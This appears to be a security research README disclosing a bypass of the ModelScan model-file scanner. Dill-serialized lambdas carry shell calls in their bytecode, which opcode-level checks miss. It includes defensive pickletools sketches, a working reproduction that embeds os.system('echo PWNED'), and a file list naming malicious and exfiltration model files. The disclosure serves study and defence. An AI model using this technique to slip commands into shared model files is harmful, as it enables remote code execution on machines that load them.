metadata
license: mit
tags:
  - security-research
  - modelscan-bypass

ModelScan Dill Bytecode Bypass PoC

Summary

Dill serializes lambdas and closures as compiled Python code objects, so a serialized function can carry arbitrary code. ModelScan only checks pickle GLOBAL opcodes for references to dangerous modules, but dill embeds the dangerous calls themselves (os.system, subprocess, etc.) in raw bytecode that the scanner does not analyze.
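To make the distinction concrete, here is a minimal sketch using only the standard library. It shows where a call such as os.system lives inside a Python function: as plain name strings and constants on the code object, next to the raw bytecode. The lambda is only inspected, never called, and the variable names are illustrative.

```python
import os

# Define the lambda but never call it; only its code object is inspected.
fn = lambda: os.system("echo PWNED")
code = fn.__code__

names = code.co_names    # names the bytecode looks up at run time
consts = code.co_consts  # constants used by the bytecode
raw = code.co_code       # the compiled bytecode itself, as bytes

print(names)             # ('os', 'system')
print("echo PWNED" in consts)
print(type(raw).__name__, len(raw))
```

The module and attribute names are ordinary data on the code object. Once that object is serialized, they are not module references at the pickle opcode level, which is why a check limited to those opcodes would not be expected to see them.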

Vulnerability

  • Format: .dill (dill serialization)
  • Scanner: modelscan 0.7.6 / 0.8.8
  • Result: "No issues found"
  • Impact: Full RCE. Any Python code can be embedded in a lambda/closure and runs when the loaded object is called

Root Cause

Dill reconstructs functions from serialized bytecode through dill._dill._create_function and dill._dill._create_code. Neither function is on modelscan's blocklist. More critically, the dangerous calls themselves (os.system, subprocess.call, etc.) are stored as compiled Python bytecode inside the serialized code object, not as pickle GLOBAL references. A scanner that only matches module names in pickle opcodes therefore cannot detect code hidden in code objects.
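The opcode-level view described above can be approximated with the standard library's pickletools, which walks a pickle stream without executing it. The sketch below is a simplified illustration, not modelscan's implementation. The helper names global_refs and rebuilds_code are hypothetical, and the STACK_GLOBAL handling is a heuristic that pairs the two most recent string pushes and ignores memo lookups.

```python
import pickle
import pickletools
from fractions import Fraction

# Opcodes that push a text string (used to resolve STACK_GLOBAL operands).
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

# Reconstruction helpers named in this README (treated here as a watch list).
CODE_BUILDERS = {
    ("dill._dill", "_create_function"),
    ("dill._dill", "_create_code"),
}

def global_refs(data):
    """List (module, name) pairs referenced by a pickle, without loading it."""
    refs, recent = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            recent = (recent + [arg])[-2:]   # keep the last two strings
        elif opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)  # genops joins them with a space
            refs.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent) == 2:
            refs.append((recent[0], recent[1]))
    return refs

def rebuilds_code(data):
    """True if the stream references a helper that rebuilds code objects."""
    return any(ref in CODE_BUILDERS for ref in global_refs(data))

# A harmless standard-library object, pickled with an old and a new protocol.
old_style = global_refs(pickle.dumps(Fraction(1, 2), protocol=2))
new_style = global_refs(pickle.dumps(Fraction(1, 2), protocol=4))
print(old_style, new_style)
```

Run against a dill file, global_refs would be expected to list the dill._dill helpers rather than os.system, which matches the root cause described here. Flagging those helpers, as rebuilds_code does, is one possible design choice for treating any by-value function as untrusted, since the bytecode itself is not inspected.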

Reproduction

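import os

import dill

# Build a lambda whose body runs a shell command
evil = lambda: os.system('echo PWNED')

# Serialize it; dill stores the lambda body as a compiled code object
with open('evil.dill', 'wb') as f:
    dill.dump(evil, f)

# Scan: modelscan reports "No issues found"
# modelscan scan -p evil.dill

# Load, then call: the call executes the embedded command
with open('evil.dill', 'rb') as f:
    loaded = dill.load(f)
loaded()  # prints PWNED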

Files

  • malicious_model.dill — Lambda calling os.system
  • exfiltration_model.dill — Lambda with data exfiltration payload